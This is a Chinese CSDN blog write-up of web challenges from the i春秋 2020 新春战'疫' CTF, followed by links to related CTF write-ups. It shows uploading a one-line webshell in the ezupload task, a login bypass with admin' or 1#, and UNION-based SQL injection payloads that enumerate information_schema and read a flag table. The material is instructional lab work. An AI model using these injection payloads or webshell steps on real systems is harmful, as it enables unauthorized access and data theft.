i春秋 2020新春战“疫”大赛(web部分)

最新推荐文章于 2022-05-03 18:52:06 发布
最新推荐文章于 2022-05-03 18:52:06 发布
阅读量806 收藏
点赞数
分类专栏: 短篇 文章标签: 安全 linux 信息安全 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42812036/article/details/104497835
版权
本文详细介绍了i春秋2020年新春战“疫”大赛中涉及的Web安全挑战,包括ezupload的提权、简单的招聘系统的SQL注入、盲注技巧、blacklist的过滤绕过、flaskapp的Pin码解密与文件读取,以及ezexpress和ezthinking的JavaScript绕过和ThinkPHP6.0的任意文件操作漏洞利用。
摘要由CSDN通过智能技术生成

在这里插入图片描述

ezupload

上传一句话,蚁剑直连,bash直接cat /flag,说没权限折腾了下Linux提权,大马提权。
payload:
cd /
cat /readflag
: (

简单的招聘系统

在这里插入图片描述
payload admin' or 1#
进入admin,成功访问招聘界面blank page界面
key处存在sql注入
在这里插入图片描述
有5个字段,显位在2
在这里插入图片描述
可以猜测后端查询语句可能类似:
select * from user where id='$id'
所以接下来的注入语句
1'union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3,4,5#
在这里插入图片描述

1'union select 1,(select group_concat(column_name) from information_schema.columns where table_name='flag'),3,4,5#
在这里插入图片描述
1'union select 1,(select flaaag from flag),3,4,5#

最低0.47元/天 解锁文章
昂首下楼梯
关注
专栏目录
i春秋第二届春秋欢乐赛RSA256writeup
hanjinrui15的博客
10-03 620
i春秋第二届春秋欢乐赛RSA256writeup 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Markdown编辑器, 可以仔细阅读这篇文章,了解一下Markdown的基本语法知识。 新的改变 我们对Markdown编辑器进行了一些功能拓展与语法支持,除了标准的Markdown编辑器功能,我们增加了如下几点新功能,帮助你用它...
2020春秋新春”网络安全公益赛——盲注
qq_34106499的博客
03-04 720
准备总结一下常见的sql注入及过滤,拿出这道题来回顾一下
i春秋2020新春役PWN之force
seaaseesa的博客
02-26 813
House of force能够使我们将堆申请到任意地址,满足以下条件,即可达到利用 能够改写top chunk的size域 能够自由控制堆分配大小 能够知道目标地址与top chunk地址之间的距离(可以泄露地址,计算出偏移) 详细见CTF-WIKIhttps://ctf-wiki.github.io/ctf-wiki/pwn/linux/glibc-heap/house_of_force...
i春秋新春WriteUp
SkYe's Blog
04-04 431
Crypto 1. easy_rsa 下载附件,内容如下: n = 2756095991838561641948627300959451346004431647633784258546355310570186953169836630463767800860279900518160131081693539400304193044550980119655489778152996261634944213...
高校”网络安全分享赛
辰星的博客
03-09 2904
2020情期间高校”网络安全分享赛,个人做出的部分WP。不足之处见谅。 MISC 简单MISC 提示为简单隐写术。附件中一张jpg图片和一个名为flag.zip的加密压缩包,很明显是让我们利用jpg获得密码解压压缩包。 我们猜测这个图片中可能存在.txt文件保存密码,16进制查看器中查看下验证猜想。 在kali中利用binwalk分离出来,并查看 得到莫尔斯码,解码得到密码,解码压缩...
2020新春”—网络安全公益赛 -misc:code_in_morse附件.zip
02-21
标题 "2020新春”—网络安全公益赛 -misc:code_in_morse附件.zip" 提到的是一个与网络安全相关的竞赛活动,名为“2020新春””,其中包含了misc(杂项)类别的一个问题,具体问题是“code_in_morse...
i春秋新春公益部分)wp
qq_43734081的博客
02-24 405
最近假期没事参加了比赛,写了wp Crytop 1.EaseyRSA 下载官方给的附件 是一个名为EasyRSA.py的文件 然后我们用py2x版本打开 看到这个样子,是不是觉得官方有点水,没错!!是的 直接附上我写好的RSA脚本 #! /usr/bin/env python2 # -*- coding: utf-8 -*- from libnum import n2s, s2n from ...
新春役网络安全公益赛-2020-misc-磁盘套娃
ChanCherry的博客
05-15 1248
题目给了一个压缩包,
2020新春快乐flash动画
07-24
标题中的“2020新春快乐flash动画”指的是一个以Flash技术制作的动画作品,主要目的是为了庆祝2020年的春节。Flash是一种广泛应用于网络的多媒体平台,它允许开发者创建互动式的动画、游戏以及应用程序,尤其在...
i春秋2020新春 SQL注入类型 writepup
a3320315的博客
02-24 960
招聘简历 这道题目是比较常见的bool注入 打开题目是一个注册登录界面 我们先尝试一下有没有注入点 我们先注册一个账号 这个时候我们在登录页面试一下有没有注入点 很明显的bool注入,1=1是恒成立的,如果and后面的条件不成立,就会返回登录失败~~ exp: # encoding=utf-8 import requests url = 'http://d3be80acd6b647538ef87...
i春秋 第二届春秋欢乐赛 Web-Hello World
qq_34106499的博客
01-20 1257
1. git源码泄露问题 2. 了解git源码泄露的原理及其漏洞利用 3. 待进一步掌握。。。
i春秋新春公益赛复现
qq_44657899的博客
02-26 1571
blaklist 以前做过BUU的强网杯随便注,不过当时的两种解法都不行,做了这道题算是又学会了一种方法,直接记录在BUU的博客里了: https://blog.csdn.net/qq_44657899/article/details/103239145 Flaskapp 在decode界面可以进行进行注入,提交payload的base64编码即可。 {{ [].__class__.__base_...
[GYCTF2020]Ez_Express
m0_63045593的博客
04-22 2209
[GYCTF2020]Ez_Express dirsearch 扫到源码 www.zip 首先回顾一下原型链污染 在我们调用一个对象的某属性时: 1.对象(obj)中寻找这一属性 2.如果找不到,则在obj.__proto__中寻找属性 3.如果仍然找不到,则继续在obj.__proto__.__proto__中寻找这一属性 以上机制被称为js的prototype继承链。而原型链污染就与这有关 原型链污染定义: 如果攻击者控制并修改了一个对象的原型,那么将可以影响所有和这个对象来自同一个类、父祖类的对象
2020新春网络安全公益赛部分web writeup
st0ut的博客
02-25 1743
前言 最近因为情,在家里都没怎么出门,正好i春秋平台举办了2020新春网络安全公益赛。学到了一些骚姿势,师傅们都tql了。。。 DAY1 简单的招聘系统 打开页面发现是一个登陆框,直接注册账号登陆进去。发现需要管理员登陆,才能解锁新功能。 在那里xss了半天,没有结果。。。。 最后重新回到登陆页面,使用万能密码登陆,发现能登进去,但是是我刚刚注册的账号,于是重新下发题目,,直接万能密码登陆,...
2020新春网络安全公益赛解题记录
A1andNS's Blog
02-27 1126
2020新春网络安全公益赛解题记录 圆满落幕的比赛,可惜我就会2题web,我有点不太行啊。 简单的招聘系统 在用户登录界面存在万能密码绕过漏洞,存在SQL注入漏洞。经过检验是字符型漏洞。 我还发现新注册用户会覆盖原来的用户,使用万能密码绕过时,默认登录最新注册的用户。 注册新用户后,发现不是第一用户,而是第二个。说明原来就有一个。Blank Page需要是admin登录才可以看见,新注册用...
[GYCTF2020]Ez_Express 原型链污染
qq_54929891的博客
05-03 571
进入链接可以发现是一个登录界面 ,自己注册一个新账户的话登陆进去什么东西也没有,提示你要用ADMIN登录,我账户名用ADMIN的话,报错敏感信息 难道是一个烦人的注入题么,不急先扫一下站看看,发现有个www.zip压缩包泄露,将源码下载下来 可以了解到是一个js的题目,寻找一下跟登录有关的界面代码 router.post('/login', function (req, res) { if(req.body.Submit=="register"){ if(safeKeyword..
Excel VBA编程基础教程:2010新春
"Excel_VBA_编程教程,excel高级教程(2010新春版) - 学习VBA语言基础,包括标识符、运算符、数据类型、变量与常量、数组、注释和赋值语句、书写规范、判断语句、循环语句、过程和函数、内部函数以及文件操作等内容" ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值